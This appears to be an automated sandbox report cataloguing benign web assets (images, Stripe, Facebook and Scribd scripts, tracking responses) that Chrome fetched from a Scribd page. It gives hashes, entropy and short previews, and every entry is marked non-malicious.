                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/309859835/149x198/394d1573f0/1716986829?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF"...WEBPVP8 .....M...*....>m2.F.#"!(u;....d..l.|@B.....V.>s.w.......3}4t'..Ay.........7.O,.R.a?......A.q.....'......l...]...?...Y.?.............o:.W._....G.?.o|./....... .....3...O........l>....k......[.....Xr#p..X...1....X....L`..iw/.H\../w.'..,...e.....;8$.O...O....o"y:..(Xi..y&...6.......4..Xd7.G3S...<...-.O..J6.....9.!!......T-....rZ.Q..Wr......E.$...V.WJX~.U.U!........8'.R....)\....B...,..4.X..tH..t.ou..kU.h..'.7l..f....{.....j.UU...ZX.K_<...dB.g...H%...... |.#ch.@'.....9..<>.b..._.|..R...<.NV:..E..Vsk.d\(.G..G.0...C3P..Y...!.>......M..~...B..ZO!.{x..{.M........ `.6.l.:3..-..v....+.-hF..a..._.S.........Gw.1 VA^r.J.:62@R.c*.23.8k.'...b.. .~t..%/...JJ....5.}N.\.%.. .....bQo......v.......2..9..u.....e..Eb..........U[..a(w;w.C.8..vzE.<=..]. .;...\}..S........qI...|.E...l.....n.j..T]r3 ~.J..4..2B.C...&.Im"....m...n.g.G.9R.R.-..1..8...w.i.T.....|..J.oWK.l.........O"....#Ph.}._.A...M^...iW.....@.v1.j...;S....\..#.d../cY.;>.....51.km .#
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-8KZ8BV0P5W&gacid=30215218.1733522367&gtm=45je4c40v9101042369z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=2071923882
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (526), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):526
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.844995662196588
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:c4GJ0k2lvgyT6d1uOMXUZsCxYADLsdfPw3CgrR5jddeU7nu:c5D2BtT67uOMXUZjxYOLsOCgrN80u
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D96C709017743C0759CF3853D1806BA5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:72E21587610C49C8305A55E71F73FA88ED618205
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA2338AA6670580269C762F51C4291DAEF913201AA8F4D4FD166C1A878262652
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:974E260ED8BD1D99628FC3248F07179F6EA228E37A6B9D3EF906DBA57571F2DF54D73F93D1F3460902D28A90BD4793BCA35477B2EF8FBF424B9112147F04BCCF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){var t=window.opener||window.parent||window;if(!t)return;t.postMessage(n.data,"*")}else o.contentWindow.postMessage(n.data,"*")};window.addEventListener?window.addEventListener("message",i,!1):window.attachEvent("onMessage",i),document.body&&document.body.appendChild(o)}();
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1864
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2452573
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.592048609772475
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:VzLEBv1OwNehqstpgNwVZewzctzz1TR5YndmSxbnlNK:VzLEzNegsgwfeIct31t5YndmSxbnlNK
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A440E0545E5A5146F10F90DF2EA13A56
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3AD6E90D8D33A4F4692F807BA03FF0CB15A1A0DE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2BA8CDBA758F6E01D09D652D19D690741B1F64790AF0AD705FC293D575CAEDE0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DAA84F0764FBD3D7A9F5E5F04369D6979AC9A068961F1A25EE7C209B3605614E9DD212FADC6F54A10138D52CFE2797427062E8ED9F6070EB8116B5B02C27BA42
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[245],{41033:(e,t,n)=>{e.exports=function(){var e={228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}},858:function(e){e.exports=function(e){if(Array.isArray(e))return e}},506:function(e){e.exports=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}},926:function(e){function t(e,t,n,r,a,i,o){try{var s=e[i](o),l=s.value}catch(e){return void n(e)}s.done?t(l):Promise.resolve(l).then(r,a)}e.exports=function(e){return function(){var n=this,r=arguments;return new Promise((function(a,i){var o=e.apply(n,r);function s(e){t(o,a,i,s,l,"next",e)}function l(e){t(o,a,i,s,l,"throw",e)}s(void 0)}))}}},575:function(e){e.exports=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}},913:function(e){function t(e,t){for(var n=0;n<t.len
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3837)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3915
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.256999822890346
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:ELekQ5N5ev5k5uCnjYp/hkn5P5ezO5zd5chvVCnj1m8hQ:aeJzU+0AjYp/6515diVAj1mmQ
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0BE903C00D81CB0DEC87B6F096A9F1B8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E90934F3D90EEB81991E3593B8BF66D7A357995C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A5805092C92F5FDA75D5EC736466C94EEA53A2E1BC14EF6A8D8C7AC7A6B8205D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:29764DBB470D7AE75E63AE5FE2EF8F782C2758B9BDF5A70AF910D610E0ACC4AA166A57D6E0AE8B2021906552CD91D8164DBD6CF1AE55A5305597263D1A0FD9C0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/74.705300.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[74],{56074:(e,t,n)=>{n.r(t),n.d(t,{default:()=>v});var r=n(96540),o=n(38544),a=n(40880),i=n(37594),l=n(17230),s=n(11865),d=n(29373);const c={footer:"_3iIesm"},p={LOCATION:"print modal",PAGE:"read"};function m({hide_modal:e}){const{handleDownload:t}=(0,d.MB)({location:p.LOCATION,page:p.PAGE});return(0,r.useEffect)((()=>{(0,s.sx)("doc:print_modal:show")}),[]),r.createElement(r.Fragment,null,r.createElement(i.OA,{onCloseClick:e},a.A.t("pdfs.lightboxes.print_lightbox.print_document")),r.createElement(i.Iu,null,a.A.t("pdfs.lightboxes.print_lightbox.in_order_to_print_this_document_")),r.createElement(i._5,{className:c.footer},r.createElement(l.QW,{onClick:e},a.A.t("pdfs.lightboxes.print_lightbox.cancel")),r.createElement(l.NL,{onClick:()=>{e(),t()},location:p.LOCATION,page:p.PAGE},a.A.t("pdfs.lightboxes.print_lightbox.download_and_print"))))}var u=n(38979),_=n(65469),h=n(51336);function f(e,t,
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4232)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4311
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.13715211008006
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:wfKrtI0Pj9v9fhPh9ryyBo8ULZUPj95Iy:+stIqj9lJ5RJBoFKj95R
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D2B955297F897DD87CDFB932535D914B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4E9237F3060610DFB92A9FC12118387654A3B26C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:65FB98DAF45C8417F536116C712B24C215414B198289831FBD630BCDED6DDA58
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F1DFD00B7F4C59F6FB543202594B24E9B1C5DDDF33B259740894DA42180EAAC69969E4261E992BC6359C75ABABFDC41891B6B14A0947F05D2BFF3171157FA745
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/300.b58766.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[300],{42300:(e,t,r)=>{r.r(t),r.d(t,{default:()=>f});var n=r(38544),a=r(23807),s=r(40880),l=r(96540),i=r(38979),o=r(11865),d=r(62832),c=r.n(d);class m extends l.Component{constructor(e){super(e)}renderLegend(){const{hideLegend:e,legend:t}=this.props;if(!t)return;const r=l.createElement("legend",null,t);return e?l.createElement(i.s6,null,r):r}render(){const{children:e,horizontal:t}=this.props;return l.createElement("div",{className:"wrapper__doc_page_shared_forms_input_group"},l.createElement("fieldset",{className:c()("input_group",{horizontal:t})},this.renderLegend(),l.Children.map(e,((e,t)=>l.cloneElement(e,{key:t})))))}}m.defaultProps={hideLegend:!1,horizontal:!1,legend:""};var p=r(51336);function u(e,t,r){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;thro
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6439
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.279279243238792
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:3rpNnjkH+c+yr7PtADPTbnuiwXJJdQsNVSczoTNl7YOy1vnQGvVO:b3n4eHetAsmoOy1nTs
                                                                                                                                                                                                                                                                                                                                                                                        MD5:40FAA3E08DEEC82C2C290889A4691CB5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FC482B45AF66D78B01D4DAAF4AE1E73D79F50DEC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D17837583F01520ED3504E296DB7904F443D75E3995BFA002C436ED5B9BBEC19
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:11A709242F47B8CC451EE68FDDECC072BB95D811FAA46BCBC9EBAEFD75BE2309A042FA838679659A739F49D48B546CAAA95F67D223C85387C57BA74CAC89A8B7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/images/scribd_logo_horiz_small_slate.svg
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg width="225px" height="50px" viewBox="0 0 225 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 43.2 (39069) - http://www.bohemiancoding.com/sketch -->. <title>scribd_logo_horiz_small_white</title>. <desc>Created with Sketch.</desc>. <defs></defs>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="scribd_logo_horiz_small_white" fill="#57617A">. <path d="M66.9903315,18.2483295 C66.9903315,15.8615892 69.1533149,13.9969483 72.5469613,13.9969483 C75.2320442,13.9969483 77.6560773,14.8546831 80.0801105,16.8312025 L81.7955801,14.5563406 C79.1477901,12.43065 76.4254144,11.3491583 72.621547,11.3491583 C67.6616022,11.3491583 64.0441989,14.3325837 64.0441989,18.5093793 C64.0441989,22.8353461 66.8038674,24.7745726 72.808011,26.0798213 C78.2900552,27.2358986 79.5953039,28.6157329 79.5953039,31.0770588
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):79942
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.340351269427417
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicIA:RIT7OXVs9ZVKBvYj8wKcHIA
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C13B840C885C1A162B92DD4A0E54EF1E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84B90BE3196CDEA75F3765454ECB2CC727439667
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7E8F3E289C154F43E925D38C1987F1D34BB6534971D53EFFCFD1591AE0BCADDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4E31723441341338E227542BA49820A63D662DE6FCA6A74F4CB6041E3F07768A35DF26C10106BBBB30883DC71815F9B45BEEC65AF4043E6D41F519269D67F65D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):7946
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.972747761957995
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:fmshahWsh4kgep8ZFJsFN/Jd6AKUU9sRwsyle7:ezZh4kjIOFNX6jUSsRwsyw7
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E65511EFC38B74D52B2BAB2E4FECB8EC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:99C9D8E8AAFB95475A8004EB42113DE0985220BA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C83EC0442B81A3E333F8D9F844870D87F7A366113598B46B0F32D02A4846A9E6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7DC9854098075245F252171B1B137AE9F238E64ADE63A74CFD136015C1452C569934AD4BB7D54CFEF15DDE5476E79777BDD5F2086810395F5557BD466F646E66
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/310560108/149x198/44055ac324/1733356526?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 .....e...*....>m*.E."..18.P...l...|...y.....r...F[.[...W........}...........7.O..._w_.~.?............W.7..r.......D.;...[...K...o..k.........S.......>....G... ....._....3...O._.?.}..G....._.=@.{...gh.......o......-..W..S.......g....._.|)..._.w.#.......2~L?..Q.c.._._....*>...z.fY.H..f.Z<..-.....d.}.)(....c....... _...|..k..7..w..=5i}.f?K#.X...R&.R....n..#..s*.+..H._.....yu.{....9.."..e..Z.D.[.-...va.iuZ.T..H...m...M..^A....6...8.Z...%3Ft..-...N.2..r.=...W.pf..M.^.*..|.&.#..@.......(&..iH........slF}..?....Y.h.\.$o..\..a......5U...;.z.r.;..'.#R..3.....|..R.....N.K8.....k....h.Q.=...>..VQ.&@...P=..Nx.}...L...3..z.|.....5. s.....%.{.........Hu...@.g*..B....3B.N.($..{A.....-...h.....S..t.1.y_tq....U..u.u..0..._).\.Q:.;..k.J1....FV.......R4...:..[N....GO'-.'s=a....z...........!(....:).nv.......32...8.>..Zr.....gD]X.n./.K.h....52./..5P.\.F.;.[y}..g.e...:.v....V..'....W......+.,..F.0.8..T.n.~...j*`Ir.B,....Z.&..%{...S.r...Tz.bWor....
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):79942
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.340351269427417
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicIA:RIT7OXVs9ZVKBvYj8wKcHIA
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C13B840C885C1A162B92DD4A0E54EF1E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84B90BE3196CDEA75F3765454ECB2CC727439667
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7E8F3E289C154F43E925D38C1987F1D34BB6534971D53EFFCFD1591AE0BCADDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4E31723441341338E227542BA49820A63D662DE6FCA6A74F4CB6041E3F07768A35DF26C10106BBBB30883DC71815F9B45BEEC65AF4043E6D41F519269D67F65D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/signals/config/287045611447707?v=2.9.178&r=stable&domain=www.scribd.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3670)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3980
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.840929067842708
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:QgiItG8em+MC7r810FaZldUMivS/Tr9K9QRqR+XX6lNO:Qge8etMOY10FaZlpivS/Tr9rRqR+XX6W
                                                                                                                                                                                                                                                                                                                                                                                        MD5:28F8122B50A7F5D7E2D0131E34308301
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7EFCAE9CC53132D77FFC2F6C908B9B497BA28832
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8359240906A24087F886912CB5988F7A3AF76F1EAB2F21ACDA532EDBD7E93C84
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CBBA06D1D233B5BB8A04B40CAA1B7A74152E548E8FF64B1F1C6D7E6FB417F4F33DF9C0580406718BF61397BA43172C87C9466420ED35428780751EB610186C35
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
